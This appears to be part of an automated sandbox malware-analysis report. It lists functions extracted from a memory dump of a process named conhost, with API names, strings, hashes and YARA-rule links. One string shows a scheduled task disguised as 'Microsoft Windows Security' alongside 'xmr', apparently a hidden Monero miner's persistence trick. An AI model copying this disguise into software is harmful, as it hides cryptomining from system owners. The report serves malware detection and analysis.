                                                                                                                                                                                                      • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6E698DB12
                                                                                                                                                                                                      • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6E698DB03
                                                                                                                                                                                                      • Unknown pseudo relocation bit size %d., xrefs: 00007FF6E698DAEA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Virtual$ProtectQuery
                                                                                                                                                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                                                                      • API String ID: 1027372294-1286557213
                                                                                                                                                                                                      • Opcode ID: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
                                                                                                                                                                                                      • Instruction ID: 9244cce571f5105f1ad5443c1ede413f9f102faffaeacbb6a7eed27279bc18da
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF91D123F2974386EA209B21D44077967A1BF457A8F544235CD2C877EADE3FE849C70A
                                                                                                                                                                                                      Function 00007FF6E698D100 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: freememcpystrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2208669145-0
                                                                                                                                                                                                      • Opcode ID: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                                                                                                                                                                                      • Instruction ID: c0316e8b7a1bd9cb58039a1ce9f45c4d874b47068b28f32312fcaa785daa35e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231C333A3D74345FA6A5A116A0037992506F907E4F184230DE5D87BE6DF3FE946C30A
                                                                                                                                                                                                      Function 00007FF6E6996260 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Byte$CharLeadMultiWide
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2561704868-0
                                                                                                                                                                                                      • Opcode ID: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                                                                                                                                                                                      • Instruction ID: e9d97cdea4fb4254601bf4131ff26019918deba6eb6b4943a8830c49fdfd6961
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1318073A2C2828AF7608F35A4013AD7690BB95798F588135EAD8C77D6CE3FD4858B05
                                                                                                                                                                                                      Function 00007FF6E6982D70 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: wcscpywcslen
                                                                                                                                                                                                      • String ID: %S /run /tn "Microsoft Windows Security"$xmr
                                                                                                                                                                                                      • API String ID: 225642448-2694755926
                                                                                                                                                                                                      • Opcode ID: 44473131342b9c3d6659860616ea861b569dae8c1284f4b33d658fc321378122
                                                                                                                                                                                                      • Instruction ID: 90596825887121e43d469a0f4af1bd2f7e5199504dc7a66ea34d21e73ad8597a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44473131342b9c3d6659860616ea861b569dae8c1284f4b33d658fc321378122
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6310723A2920345EA209F11E4007BAB690FB443A4F844636EE5D863E7EF3FE045C349
                                                                                                                                                                                                      Function 00007FF6E69833D0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: wcslen
                                                                                                                                                                                                      • String ID: 0$@
                                                                                                                                                                                                      • API String ID: 4088430540-1545510068
                                                                                                                                                                                                      • Opcode ID: 26fbaa74645c58beb1c662cd1072959fce96db4e188e223cb72cb4d6abf3e704
                                                                                                                                                                                                      • Instruction ID: 6a424c49f5ecce2a3370c5b28a5a2d8cefab60ecdb04decd3676925b9ed1131e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26fbaa74645c58beb1c662cd1072959fce96db4e188e223cb72cb4d6abf3e704
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A216B3361878186E3208BA5F44579BB6A4FBD4798F604135FB8887B5AEF7ED049CB04
                                                                                                                                                                                                      Function 00007FF6E6988685 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 63stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                      • String ID: this${parm#$}
                                                                                                                                                                                                      • API String ID: 39653677-3278767634
                                                                                                                                                                                                      • Opcode ID: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
                                                                                                                                                                                                      • Instruction ID: 061a20401ce0ac17546182f73ad3b769378b00f3db02e23ad1e51d58b6b853eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70218D73A5C68385E7668F2494003F92751EB05B98F488032CE494BA9ADF7FE4869366
                                                                                                                                                                                                      Function 00007FF6E6983580 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: wcslen
                                                                                                                                                                                                      • String ID: 0$@
                                                                                                                                                                                                      • API String ID: 4088430540-1545510068
                                                                                                                                                                                                      • Opcode ID: aea334ff16771d315f46423bd26d5fdcc2d3ba9439c4921da91f434a81118734
                                                                                                                                                                                                      • Instruction ID: 7688438bf1316a36289a3169591cd78ed115dd8c35bf0857c037413ad18aca88
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aea334ff16771d315f46423bd26d5fdcc2d3ba9439c4921da91f434a81118734
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9111BF2262878286E7109BA5F48539AB760FFD4358F500135FB8C87B6AEF7EC446CB04
                                                                                                                                                                                                      Function 00007FF6E698D430 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-3474627141
                                                                                                                                                                                                      • Opcode ID: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
                                                                                                                                                                                                      • Instruction ID: 98b7f277db33b94f43ae81304dd305ddadee5325f53fbce7c3750d44705032ed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD01C223918F89C6E2128F2CE8012EA7374FF99759F145321EA8D66261EF2BD543C704
                                                                                                                                                                                                      Function 00007FF6E698D4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-2187435201
                                                                                                                                                                                                      • Opcode ID: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
                                                                                                                                                                                                      • Instruction ID: dd1b6ea79e3fa86112b7769019b7cddf41cf969490a47765d699f9c2f50b7469
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFF0C223818F4985E201CF28A4002EAB334FF8D799F185325EA8D26161DF2BD642C304
                                                                                                                                                                                                      Function 00007FF6E698D4F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-4273532761
                                                                                                                                                                                                      • Opcode ID: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
                                                                                                                                                                                                      • Instruction ID: 0dc133f10a3c6e1bd0cf6b0b924131c7821e4e5abf921290115dadb623d6ddc7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12F06263919F4985E2118F28A4002EAB374FF8D799F185325EA8D26565DF2AD682C704
                                                                                                                                                                                                      Function 00007FF6E698D4D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-4064033741
                                                                                                                                                                                                      • Opcode ID: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
                                                                                                                                                                                                      • Instruction ID: d34011aa3f5e32d7d390ff81a080f399a2a484649c609931946124e16083c6b9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F06263919F4985E2118F28A4002EAB374FF8E799F185325EA8D26565DF2AD642C704
                                                                                                                                                                                                      Function 00007FF6E698D500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-4283191376
                                                                                                                                                                                                      • Opcode ID: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
                                                                                                                                                                                                      • Instruction ID: 5b92195a3fd7b535f4442a15d2fd750043b19b27ecc95ce3923dce4121db03d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2F06263919F4985E211CF28A4002FAB374FF8D799F285325EA8D26565DF2BD643C704
                                                                                                                                                                                                      Function 00007FF6E698D510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-2468659920
                                                                                                                                                                                                      • Opcode ID: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
                                                                                                                                                                                                      • Instruction ID: 8b26461fe1bf361a462c7bbdfd76dd5e6e4d4d601ca5958dfcb479e9eeb67c12
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9F0C263818F4985E211CF28A4002EBB330FF8D799F185326EA8D66561DF2AD642C304
                                                                                                                                                                                                      Function 00007FF6E698D461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000026.00000002.2912630385.00007FF6E6981000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6E6980000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912554087.00007FF6E6980000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912705488.00007FF6E699A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912760460.00007FF6E699C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2912838239.00007FF6E69A5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000026.00000002.2913246298.00007FF6E69A8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_38_2_7ff6e6980000_conhost.jbxd
